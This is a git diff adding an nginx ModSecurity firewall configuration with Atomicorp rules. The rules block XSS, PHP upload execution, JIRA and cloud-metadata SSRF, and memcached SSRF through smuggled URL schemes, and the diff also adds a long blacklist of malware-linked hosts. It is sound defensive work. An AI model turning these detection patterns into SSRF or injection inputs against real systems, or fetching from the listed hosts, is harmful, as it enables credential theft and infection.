+SecRule REQUEST_URI "/info/whitelist\.pac"  "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:381238,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: /info/whitelist.pac worm probe',logdata:'%{TX.0}'"
+
+#Really vulnerable app
+#src="
+SecRule ARGS " ?src ?= ?\" ?https?:/"  "log,deny,log,status:403,auditlog,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,capture,id:381239,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: XSS attack',logdata:'%{TX.0}'"
+
+#phpsysinfo
+#SecRule REQUEST_URI "(?:/phpsysinfo|ehcp_postfix\.sh|/ehcp/(?:apache(?:hcp|_|template)|named_|ehcp(?:-apt-get-install\.log|install)|.*\.(?:co?nf|sh|sql|cert|key)$|ehcp_?daemon|/etc(?:/apache|logrotate.d)|php(?:admin|myadmin)|scriptsupdate\.sql|stats.\php|/misc/(?:importexport|mysqltroubleshooter|redirect_index\.html|serverstatus\.sh)))" # "log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:382239,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Easy Hosting Control Panel information leak attack denied',logdata:'%{TX.0}'"
+
+#wp-content/uploads/filename/.*.php;.jpg
+#SecRule REQUEST_URI "wp-content/uploads/.*\.ph(?:p|tml|t)" 
+SecRule REQUEST_FILENAME "wp-content/uploads/.*\.ph(?:p|tml|t)"  "phase:2,status:403,log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace,capture,id:382238,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP file execution in uploads directory denied',logdata:'%{TX.0}'"
+
+#GET /status?full=true
+#jboss status probe
+SecRule REQUEST_URI "/status\?full=true"  "phase:2,status:403,log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace,capture,id:382240,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: JBOSS probe denied'"
+
+#JIRA
+#block
+#https://www.mysite.com/login?os_destination=https://www.google.com would
+SecRule REQUEST_URI "login"  "chain,phase:2,status:403,log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:382292,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: JIRA attack blocked'"
+SecRule ARGS:os_destination "^(?:ogg|tls|gopher|data|php|glob|phar|dict|ssh2|rar|expect|zip|zlib|(?:ht|f)tps?):/"
+
+# https://www.mysite.com/login?os_destination=/login.jsp is ok.
+#SecRule REQUEST_URI "login"  "chain,phase:2,status:403,log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:382293,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: JIRA attack blocked'"
+#SecRule ARGS:os_destination "!(^/login\.jsp$|^$|^\%browse\%)" "t:none,t:urlDecodeUni"
+
+#plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
+SecRule REQUEST_URI "plugins/servlet/oauth/users/icon-uri"  "chain,phase:2,status:403,log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:382291,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: JIRA SSRF attack blocked'"
+SecRule ARGS:consumerUri "^http"
+
+SecMarker END_JITP_SPECIAL
+
+#Embargo violated so details public
+SecRule ARGS|!ARGS:/message/|!ARGS:post|!ARGS:/email/|XML:/*  "\:/?/169\.254\.[0-9]+\.[0-9]+/[a-z]+/"         "phase:2,status:403,deny,log,auditlog,id:337109,rev:4,severity:2,t:none,t:utf8toUnicode,t:urlDecodeUni,t:hexdecode,t:base64decode,t:lowercase,t:removeWhiteSpace,multimatch,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SSRF attack blocked'"
+
+#/latest/meta-data/
+SecRule REQUEST_URI|XML:/*|ARGS|!ARGS:/message/|!ARGS:post  "/latest/meta-data/"         "phase:2,status:403,deny,log,auditlog,id:337110,rev:5,severity:2,t:none,t:utf8toUnicode,t:urlDecodeUni,t:hexdecode,t:lowercase,t:removeWhiteSpace,multimatch,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AWS SSRF attack blocked'"
+SecRule REQUEST_URI|XML:/*|ARGS|!ARGS:/message/|!ARGS:post  "/latest/meta-data/"         "phase:2,status:403,deny,log,auditlog,id:337111,rev:5,severity:2,t:none,t:base64decode,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AWS SSRF attack blocked'"
+
+#memcached SSRF
+SecRule ARGS|REQUEST_URI|!ARGS:/message/|!ARGS:post "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|ssh2?|dict|expect|(?:ht|f)tps?)://?[a-z0-9\.]+/\:11211"         "phase:2,status:403,deny,log,auditlog,id:337181,rev:2,severity:2,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible memcached SSRF attack blocked'"
+
+
+
diff --git a/nginx-waf/bad_agents.txt b/nginx-waf/bad_agents.txt
new file mode 100644
index 0000000..22f5311
--- /dev/null
+++ b/nginx-waf/bad_agents.txt
@@ -0,0 +1 @@
+Put your bad agent strings in this file
diff --git a/nginx-waf/conf/00_mod_security.conf b/nginx-waf/conf/00_mod_security.conf
new file mode 100644
index 0000000..916ed67
--- /dev/null
+++ b/nginx-waf/conf/00_mod_security.conf
@@ -0,0 +1,24 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+modsecurity on;
+modsecurity_rules_file /etc/httpd/modsecurity.d/tortix_waf.conf;
+modsecurity_rules_file /etc/httpd/modsecurity.d/00_asl_whitelist.conf;
+modsecurity_rules_file /etc/httpd/modsecurity.d/00_asl_x_searchengines.conf;
+modsecurity_rules_file /etc/httpd/modsecurity.d/00_asl_y_searchengines.conf;
+modsecurity_rules_file /etc/httpd/modsecurity.d/00_asl_z_antievasion.conf;
+modsecurity_rules_file /etc/httpd/modsecurity.d/00_asl_zz_strict.conf;
+modsecurity_rules_file /etc/httpd/modsecurity.d/01_asl_content.conf;
+modsecurity_rules_file /etc/httpd/modsecurity.d/03_asl_dos.conf;
+modsecurity_rules_file /etc/httpd/modsecurity.d/05_asl_exclude.conf;
+modsecurity_rules_file /etc/httpd/modsecurity.d/10_asl_rules.conf;
+modsecurity_rules_file /etc/httpd/modsecurity.d/11_asl_data_loss.conf;
+modsecurity_rules_file /etc/httpd/modsecurity.d/12_asl_brute.conf;
+modsecurity_rules_file /etc/httpd/modsecurity.d/20_asl_useragents.conf;
+modsecurity_rules_file /etc/httpd/modsecurity.d/30_asl_antispam.conf;
+modsecurity_rules_file /etc/httpd/modsecurity.d/31_asl_urispam.conf;
+modsecurity_rules_file /etc/httpd/modsecurity.d/50_asl_rootkits.conf;
+modsecurity_rules_file /etc/httpd/modsecurity.d/51_asl_rootkits.conf;
+modsecurity_rules_file /etc/httpd/modsecurity.d/60_asl_recons.conf;
+modsecurity_rules_file /etc/httpd/modsecurity.d/61_asl_recons_dlp.conf;
+modsecurity_rules_file /etc/httpd/modsecurity.d/98_asl_jitp.conf;
+modsecurity_rules_file /etc/httpd/modsecurity.d/99_asl_jitp.conf;
+
diff --git a/nginx-waf/conf/nginx.conf b/nginx-waf/conf/nginx.conf
new file mode 100644
index 0000000..993bd22
--- /dev/null
+++ b/nginx-waf/conf/nginx.conf
@@ -0,0 +1,87 @@
+
+# For more information on configuration, see:
+#   * Official English Documentation: http://nginx.org/en/docs/
+#   * Official Russian Documentation: http://nginx.org/ru/docs/
+
+user nginx;
+worker_processes auto;
+error_log /var/log/nginx/error.log;
+pid /run/nginx.pid;
+
+# Load dynamic modules. See /usr/share/doc/nginx/README.dynamic.
+include /usr/share/nginx/modules/*.conf;
+
+events {
+    worker_connections 1024;
+}
+
+http {
+    log_format  main  '$remote_addr - $remote_user [$time_local] "$request" '
+                      '$status $body_bytes_sent "$http_referer" '
+                      '"$http_user_agent" "$http_x_forwarded_for"';
+
+    access_log  /var/log/nginx/access.log  main;
+
+    sendfile            on;
+    tcp_nopush          on;
+    tcp_nodelay         on;
+    keepalive_timeout   65;
+    types_hash_max_size 4096;
+
+    include             /etc/nginx/mime.types;
+    default_type        application/octet-stream;
+
+    # Load modular configuration files from the /etc/nginx/conf.d directory.
+    # See http://nginx.org/en/docs/ngx_core_module.html#include
+    # for more information.
+    include /etc/nginx/conf.d/*.conf;
+
+    server {
+        listen       80;
+        listen       [::]:80;
+        server_name  _;
+        root         /usr/share/nginx/html;
+
+        # Load configuration files for the default server block.
+        include /etc/nginx/default.d/*.conf;
+
+        error_page 404 /404.html;
+        location = /404.html {
+        }
+
+        error_page 500 502 503 504 /50x.html;
+        location = /50x.html {
+        }
+    }
+
+# Settings for a TLS enabled server.
+#
+#    server {
+#        listen       443 ssl http2;
+#        listen       [::]:443 ssl http2;
+#        server_name  _;
+#        root         /usr/share/nginx/html;
+#
+#        ssl_certificate "/etc/pki/nginx/server.crt";
+#        ssl_certificate_key "/etc/pki/nginx/private/server.key";
+#        ssl_session_cache shared:SSL:1m;
+#        ssl_session_timeout  10m;
+#        ssl_ciphers PROFILE=SYSTEM;
+#        ssl_prefer_server_ciphers on;
+#
+#        # Load configuration files for the default server block.
+#        include /etc/nginx/default.d/*.conf;
+#
+#        error_page 404 /404.html;
+#            location = /40x.html {
+#        }
+#
+#        error_page 500 502 503 504 /50x.html;
+#            location = /50x.html {
+#        }
+#    }
+
+}
+
+daemon off;
+
diff --git a/nginx-waf/conf/tortix_waf.conf b/nginx-waf/conf/tortix_waf.conf
new file mode 100644
index 0000000..d42d38b
--- /dev/null
+++ b/nginx-waf/conf/tortix_waf.conf
@@ -0,0 +1,24 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+SecRuleEngine on
+SecRequestBodyAccess On
+SecResponseBodyMimeType (null) text/html text/plain text/xml
+SecUploadDir /tmp
+SecUploadKeepFiles off
+SecAuditEngine RelevantOnly
+SecAuditLogRelevantStatus "^(?:5|4(?!04))"
+SecAuditLogType Concurrent
+SecAuditLog /var/log/nginx/audit_log
+SecAuditLogParts ABIFHZ
+SecCookieFormat 0
+SecDataDir /tmp
+SecTmpDir /tmp
+SecAuditLogStorageDir /var/asl/data/audit
+SecRequestBodyLimit 134217728
+SecResponseBodyLimitAction ProcessPartial
+SecRequestBodyNoFilesLimit 1048576
+SecAuditLogDirMode 0770
+SecPcreMatchLimit 150000  
+SecPcreMatchLimitRecursion 150000
+SecResponseBodyAccess on
+SecCollectionTimeout 86400
+
diff --git a/nginx-waf/domain-blacklist-local.txt b/nginx-waf/domain-blacklist-local.txt
new file mode 100644
index 0000000..e69de29
diff --git a/nginx-waf/domain-blacklist.txt b/nginx-waf/domain-blacklist.txt
new file mode 100644
index 0000000..91a2dbe
--- /dev/null
+++ b/nginx-waf/domain-blacklist.txt
@@ -0,0 +1,43 @@
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.x
+#
+# Created by Atomicorp (http://www.atomicorp.com)
+# Copyright 2013-2021 by Atomic Corpate Industries Inc. , all rights reserved.
+# Copyright 2005-2013 by Prometheus Global, all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is 
+# prohibited unless prior written permission is obtained from the 
+# copyright holder. 
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS   
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE   
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE   
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE   
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR   
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF   
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS   
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN   
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)   
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF   
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+thelounge.net
+www.nioki.fr
+www.timkendall.ca
+android.telrock.net
+web.telrock.net
+muslim.purplesphere.in/
+men.sexblog.pw/
+currency-trading-brokers.com
+fakepassportonline.cc
+musclegainer.org
+talkwithwebvisitors.com
diff --git a/nginx-waf/domain-spam-whitelist.conf b/nginx-waf/domain-spam-whitelist.conf
new file mode 100644
index 0000000..dfe938d
--- /dev/null
+++ b/nginx-waf/domain-spam-whitelist.conf
@@ -0,0 +1,3 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# This file has been migrated to domain-spam-whitelist.txt
+#
diff --git a/nginx-waf/domain-spam-whitelist.txt b/nginx-waf/domain-spam-whitelist.txt
new file mode 100644
index 0000000..a78926a
--- /dev/null
+++ b/nginx-waf/domain-spam-whitelist.txt
@@ -0,0 +1 @@
+.googlesyndication.com/pagead/ads?client=
diff --git a/nginx-waf/dos_protected.txt b/nginx-waf/dos_protected.txt
new file mode 100644
index 0000000..64c5c87
--- /dev/null
+++ b/nginx-waf/dos_protected.txt
@@ -0,0 +1 @@
+xmlrpc.php
diff --git a/nginx-waf/honeypot-files.txt b/nginx-waf/honeypot-files.txt
new file mode 100644
index 0000000..e69de29
diff --git a/nginx-waf/malware-blacklist-high.txt b/nginx-waf/malware-blacklist-high.txt
new file mode 100644
index 0000000..f17f51f
--- /dev/null
+++ b/nginx-waf/malware-blacklist-high.txt
@@ -0,0 +1,2874 @@
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.x
+#
+# Created by Atomicorp (http://www.atomicorp.com)
+# Copyright 2013-2021 by Atomic Corpate Industries Inc. , all rights reserved.
+# Copyright 2005-2013 by Prometheus Global, all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is 
+# prohibited unless prior written permission is obtained from the 
+# copyright holder. 
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS   
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE   
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE   
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE   
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR   
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF   
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS   
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN   
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)   
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF   
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+0x0134.lan.io/
+0xg3458.hub.io/
+.110mb.com/
+122.208.207.230/
+12.30.229.109/
+123456789leo.fileave.com/
+123.wwwwool.cn/
+125.32.112.207/
+1337h4x.dyndns.org/
+140.111.13.68/
+140.119.80.185/
+140.128.187.8/
+142.176.17.11/
+147741147.fileave.com/
+148.245.107.2/
+150.35.244.118/
+157.252.98.142/
+163.23.111.222/
+163.23.99.193/
+171817.171817.com/
+1800-search.com/
+190.7.235.5/
+190.8.128.58/
+194.169.192.121/
+195.93.218.25/
+199k.info/
+1.ads555.com/
+1.xks08.com/
+200.113.182.114/
+200.171.85.170/
+200.206.133.225/
+200.220.159.91/
+200.220.215.214/
+200.26.140.102/
+2005-search.com/
+200.60.235.74/
+200.78.235.178/
+2007.cultuurmarathon.nl/
+201.29.26.214/
+201.29.73.234/
+201.29.97.185/
+201.51.198.224/
+201.59.14.195/
+202.102.135.97/
+203.109.16.67/
+203.71.212.3/
+203.71.239.19/
+204.11.228.115/
+205.177.122.100/
+205.234.128.98/
+206.161.127.72/
+206.173.113.154/
+206.51.233.130/
+207.150.184.73/
+207.234.185.217/
+207.35.44.70/
+208.179.140.215/
+208.241.177.80/
+208.53.183.183/
+208.7.42.36/
+209.250.234.234/
+209.43.123.143/
+209.51.138.194/
+210.11.174.71/
+210.71.66.24/
+211.140.51.12/
+211.182.212.135/
+212.128.140.23/
+212.239.40.78/
+213.16.42.226/
+213.167.146.194/
+213.171.222.111/
+213.184.65.80/
+213.189.224.23/
+213.221.110.73/
+213.92.110.91/
+213.93.59.44/
+216.133.246.52/
+216.152.240.10/
+216.152.240.11/
+216.152.240.12/
+216.152.240.13/
+216.152.240.14/
+216.191.16.12/
+216.191.16.13/
+216.235.245.18/
+216.69.161.193/
+217.125.24.22/
+217.19.190.202/
+217.73.66.1/
+217.79.220.27/
+217.79.68.17
+218.10.111.119/
+218.150.108.56/
+218.150.110.122/
+218.38.34.152/
+218.75.91.254/
+218.84.59.218/
+219.150.93.35/
+220.134.235.165/
+220.189.255.29/
+222.122.158.125/
+222.236.44.154/
+222.73.247.201/
+222.73.247.202/
+222.73.254.67/
+25gvt.webcindario.com/
+268ip.com/
+2697postscards.my2gig.com/
+2.trojan8.com/
+3322.net/
+.3322.org/
+33.xingaide8.cn/
+34639.webtest.goneo.de/
+3dmr.gamedesign.net/
+3dsymax.org/
+3traff.com/
+4internetgold.com/
+58.211.8.15/
+58.65.234.105/
+58.65.239.42/
+59.124.30.101/
+59.127.40.143/
+59.33.247.30/
+5kittens.net/
+60.190.118.140/
+60.190.118.15/
+60.190.118.182/
+60.190.118.203/
+60.190.118.31/
+60.190.118.50/
+60.190.118.71/
+60.248.47.52/
+61.129.163.4/
+61.129.45.132/
+61.160.208.114/
+61.191.55.216/
+61.53.235.92/
+62.140.224.114/
+62.213.0.8/
+62.21.83.40/
+64.185.237.35/
+64.22.125.219/
+64.28.184.168/
+64.28.184.170/
+64.28.184.172/
+64.28.184.173/
+64.28.184.178/
+64.28.184.185/
+64.28.184.201/
+64.28.184.202/
+64.40.146.64/
+64.70.238.131/
+65.18.209.152/
+65.247.182.200/
+.6600.org/
+66.152.93.119/
+66.153.86.221/
+66.175.197.174/
+66.194.79.1/
+66.220.17.157/
+66.220.9.57/
+66.240.181.129/
+.663.com.cn/
+66.45.235.228/
+66.77.165.68/
+67.15.84.42/
+67.18.123.162/
+67.198.192.27/
+67.37.243.69/
+68.178.218.158/
+69.20.25.92/
+69.50.161.126/
+69.7.205.108/
+69.88.133.133/
+69.93.196.186/
+70.158.51.114/
+70.87.62.18/
+72.1.78.162/
+72.41.129.206/
+72.55.175.41/
+74.0.89.210/
+74.54.207.2/
+76.162.170.34/
+76.76.13.95/
+777.za123.cn/
+77.90.18.110/
+79.135.181.74/
+7traff.com/
+80.218.98.245/
+80.231.130.12/
+80.25.138.94/
+80.35.20.109/
+80.50.253.90/
+80.92.79.3/
+82.103.72.218/
+82.146.39.92/
+82.165.242.46/
+83.143.18.122/
+83.149.65.105/
+83.19.144.26/
+83.240.230.53/
+84.32.137.157/
+85.114.128.21/
+85.114.140.107/
+85.25.141.39/
+85.25.48.60/
+85.255.114.162/
+85.255.114.165/
+85.255.115.226/
+85.255.118.45/
+85.255.120.126/
+85.255.120.26/
+85.255.121.162/
+85.25.81.140/
+86.58.131.42/
+.8800.org/
+8800.org/
+88.191.22.160/
+88.255.90.14/
+8866.org/
+89.106.23.150/
+89.35.26.223/
+89.76.171.43/
+91.184.48.119/
+.9966.org/
+9966.org/
+9ata.ch/
+aband.altervista.org/
+abandu.altervista.org/
+abb.altervista.org/
+abbe.webd.pl/
+abelcoinc.com/
+abssair.no.sapo.pt/
+acces-direct.net/
+acceso.masminutos.com/
+aceperform.110mb.com/
+aceperform.890m.com/
+acme-superstore.com/
+acs-fungamer.de/
+action.telefragged.com/
+adambrown.eu/
+ad.goog1e.googlepages.com/
+adrianuzzo1985.altervista.org/
+ads.adslooks.info/
+.ads.la/
+ads.z-quest.com/
+adventuregadgets.com/
+afcmoney.org/
+afintra.com/
+afronet.net/
+agonyandivy.com/
+agrocaes.com.br/
+ahvma.org/
+ajurox.com/
+akamai.downloadv3.com/
+akekop.890m.com/
+albcrew.freehostia.com/
+albinfo.freehostia.com/
+alboradaquartet.org/
+alcohol114.com/
+alltojesus.org/
+aloni.memebot.com/
+alsolitoposto.biz/
+altervista.org/
+aluigi.altervista.org/
+aluigi.org/
+always-wondering.diary.ru/
+amcloscabos.com/
+amelia10.50webs.com/
+americanpsycho.net/
+amoravela.com.sapo.pt/
+amordevida.com.sapo.pt/
+ampportal.biz/
+amrc.com.tw/
+amygirl.3-hosting.net/
+amygirl.chat.ru/
+amygirl.land.ru/
+amygirl.siteburg.com/
+amygirl.webs.io/
+amyru.h18.ru/
+amyvsweddingspartyss.eclub.lv/
+anakdompu.files.wordpress.com/
+andrilaras.net/
+andysplog.chat.ru/
+aneuk.com/
+angel.yum.pl/
+anjink.co.cc/
+ann.superprast.net/
+anonimo40.interfree.it/
+antihackerlink.or.id/
+antispywaremaster.com/
+aoev.at/
+aoka.sleepsycho.com/
+apacheparty.chat.ru/
+.apescar.net/
+apm-3.ru/
+arcadenoe.sapo.pt/
+arcade.ya.com/
+arcantus.we.bs/
+arche-feldkirchen.de/
+archives.neohapsis.com/
+armageddon0683.zoomshare.com/
+artdeli.co.kr/
+artmorrison.com/
+asaudades10021.com.sapo.pt/
+asaudades10024.com.sapo.pt/
+asc.275mb.com/
+asidfloridawestcoast.com/
+askastro.com/
+assistatv.plughosting.com.br/
+asterweb.com.br/
+astrix-projects.com/
+astroindo.org/
+AstroIndo.Org/
+atendimento01.iespana.es/
+ativando-email3.rbcmail.ru/
+atomic.itsamac.com/
+autodelen.net/
+autogg.it/
+avvv.altervista.org/
+avvvvv.altervista.org/
+awonderfulauction.com/
+a.x.apescar.net/
+ay2dayz-download.com/
+azspromservice.ru/
+b0x3d.110mb.com/
+babywendy.eclub.lv/
+backstaroup.home.sapo.pt/
+bagolster.com/
+baidu1633.com/
+baixador.webcindario.com/
+baixararquivos.com.sapo.pt/
+baixejaok.webcindario.com/
+bajalogratis.net/
+bajigur.net/
+bakuforum.net/
+bancodedados1002.fileave.com/
+bandas.com.ar/
+barefootscience.com/
+barges.t35.com/
+barnwellweb.com/
+barza.us/
+bashdrfunk.fileave.com/
+bashkllr.fileave.com/
+basiclifesaving.org/
+bazar.lancut.org/
+bb.avpkav.com/
+bbb8brazil.idoo.com/
+bdsauctionsite.com/
+bdv.bidvertiser.com/
+beautiful-atlanta.com/
+benedon.net/
+bestlist.t35.com/
+beta.bluesite.communicode.de/
+beverlyannhope.org/
+bglradio.net/
+b-hind.com/
+bhlserver.net/
+bid.e7studio.net/
+biggetonething.cn/
+biglion.altervista.org/
+biluteteia.t35.com/
+birka.no/
+bkk1.serversiam.com/
+blackid.org/
+bladeilegal.t35.com/
+blog10.t35.com/
+blogmico.t35.com/
+blogs2007salvado.t35.com/
+blogsonline.pop3.ru/
+bloguol.t35.com/
+blueislandestates.com/
+bluesnews.com/
+bmcbeth.com/
+bmwst.do.sapo.pt/
+bnb-chambresdhotes.ch/
+bobatka.info/
+bocairent.net/
+body-and-soul-discovery.com/
+bola-mania.com/
+bondex.ru/
+boringtime.com/
+borovskr.kaluga.ru/
+botv2.das-forum24.de/
+boxstr.com/
+boyz.madoo.com/
+bpec-english.com/
+branigan.net/
+brendonmorris.co.za/
+br.geocities.com/
+brmania.t35.com/
+brotherhoodlounge.com/
+brothers.ro/
+brutalside.com/
+bsn.thecomit.com/
+bucare.altervista.org/
+buceta-22.pochta.ru/
+buckleymanagement.com/
+bugbug.land.ru/
+busca.uol.com.br/
+buxxo.no.sapo.pt/
+bxsafe.iespana.es/
+ca.geocities.com/
+caixa-gov.mail333.su/
+caizer.com/
+calendar.ccvac.us/
+caloteiros.iespana.es/
+camaradirigenteslogistasbrasil.pisem.su/
+camilovr.com/
+campania.podis.it/
+campexpedition.net/
+canalmasde20.nocayan.net/
+canalpt.net/
+cancelaaa.rbcmail.ru/
+cancelam3nt0.rbcmail.ru/
+cancelregistration.smtp.ru/
+capodorso.com/
+carbys.no.sapo.pt/
+cardamorhtml.no.sapo.pt/
+cardpaixao.esmartdesign.com/
+cards2007.rbcmail.ru/
+cardsmusical.webcindario.com/
+cardss2006.no.sapo.pt/
+cardsvirtual01.pop3.ru/
+cards.webhouse.com.eg/
+carnafest0001.com.sapo.pt/
+carnet.sakura.ne.jp/
+carousuario.front.ru/
+carruga.altervista.org/
+cartao04954594.mail15.com/
+cartaoemocoes4.rbcmail.ru/
+cartaoespecial.my2gig.com/
+cartaolegal.t35.com/
+cartaolfeliznatal.my2gig.com/
+cartaonatalmfeliz.my2gig.com/
+cartaovirtual2006.no.sapo.pt/
+cartaovoxcard.mail15.su/
+cartoesnovos.250x.com/
+cartoespessoal.webcindario.com/
+cartoesuol.com.sapo.pt/
+cartorio-24horas.pop3.ru/
+casavie.net/
+caukoreanmusic.goanygate.com/
+cben.net/
+cc.avpkav.com/
+ccornuto.275mb.com/
+cct.vg/
+cdn2.movies-etc.com/
+cdn.drivecleaner.com/
+cdr.sugong.org/
+channels.dal.net/
+charitygrants.org/
+charlotte.dnoche.com/
+.chat.ru/
+cheat.memebot.com/
+checkitoutrenoir.free.fr/
+cherrygirl.h18.ru/
+chrisweb.biz/
+chrystylcoiffure.com/
+chyna.by.ru/
+chyna.sufx.net/
+ciberia.ya.com/
+cicarelli.fromru.com/
+cicoc.com/
+cidhelp.com/
+cilab.upf.edu/
+ciutatgegantera2008.svh.cat/
+cjb11.land.ru/
+claroline.lct-net.cl/
+classyclassified.com/
+clat.org/
+client133.faster-hosting.com/
+clsc.mmu.edu.my/
+club.busanilbo.com/
+club.telepolis.com/
+CMD/
+cmdz.diinoweb.com/
+coaxial.890m.com/
+cobranca.diinoweb.com/
+cocreation.hk/
+cod4community.com/
+collegejacquesprevert.ca/
+cominidade2007.pochta.ru/
+communityflow.com/
+comunicacion.nccextremadura.net/
+conectweb.webcindario.com/
+consultafree.fileave.com/
+contactcraze.com/
+content.afenya.com/
+cool.47555.com/
+coolsms.247ihost.com/
+corp.krugle.com/
+corvette.i-photos.net/
+cosmosindoabadi.co.id/
+cotine.net/
+cottagenet.com/
+course-notes.org/
+cpcruzdelrio.juntaextremadura.net/
+creative.canberra.edu.au/
+creativeepoxyflooring.com/
+creber.free.fr/
+crime.fileave.com/
+cross-way.net/
+csandberg.net/
+csinfo.pl/
+cupido2007a.t35.com/
+cyclonekey.100webspace.net/
+d1musicnet.com/
+dagenk.tripod.com/
+dalbuxa.web.cedant.com/
+daming.gary.com.tw/
+danilu.by.ru/
+danthefarrier.co.uk/
+daoc.nisrv.com/
+darinhosurfbord.webcindario.com/
+dark.ycfa.org.tw/
+daryl.freehostia.com/
+daystar.meibu.com/
+daystarrecords.bizland.com/
+dd3str0y3r.110mb.com/
+ddddryan1918hahahskinnyboy.mail333.su/
+ddos.fuckunion.com/
+deathcreweb.altervista.org/
+deddi.uni.cc/
+demo.td-pro-services.com/
+deniamusic.com/
+deposito.easyaccesssite.com/
+deposito.hostance.net/
+deposito.instantdoor.com/
+deposito.quickstaraccess.com/
+deposito.traffic-advance.net/
+deposito.trafficredlight.net/
+designclub.webcindario.com/
+desk.webcindario.com/
+destinos-voegol.mail333.com/
+detlef.com/
+dev1l.t35.com/
+diamantino.mt.gov.br/
+dicoa.com/
+die-ponyreiter.de/
+digilander.libero.it/
+digitalmediawire.com/
+direma.at/
+discount-guns.com/
+divou.iespana.es/
+dj4you.ch/
+djmca.com.ar/
+dkgerman.dankook.ac.kr/
+dl.targetsaver.com/
+dmttoiletng.com/
+dns4biz.org/
+dointhestuff.org/
+dominic888.no-ip.info/
+doodlepacific.com/
+doryan.3x.ro/
+dosbr.fwhost.org/
+dostyurekler.net/
+down.hao365.org/
+downloadex.bravehost.com/
+download.securitylab.ru/
+dragoc.bravehost.com/
+dritoni.ch/
+dsvv.org/
+dt-support.com/
+dutchstockingpage.com/
+eagles-tailgate.com/
+eas.apm.emediate.eu/
+easyeraser.com/
+easylivetalk.com/
+ebbw.net/
+ecology.275mb.com/
+editoraabril2007.com.sapo.pt/
+edu-web.eu/
+ee.avpkav.com/
+efardella.cinet.it/
+ehlcc.com/
+eilan.org/
+elitewebserver.com/
+elixirjp.co.jp/
+elurbano.com/
+elveon.tripod.com/
+emachine.com.hk/
+embratelbrasil21.t35.com/
+embratelfaz21.webcindario.com/
+empresasx.webcindario.com/
+emptyhearts.net/
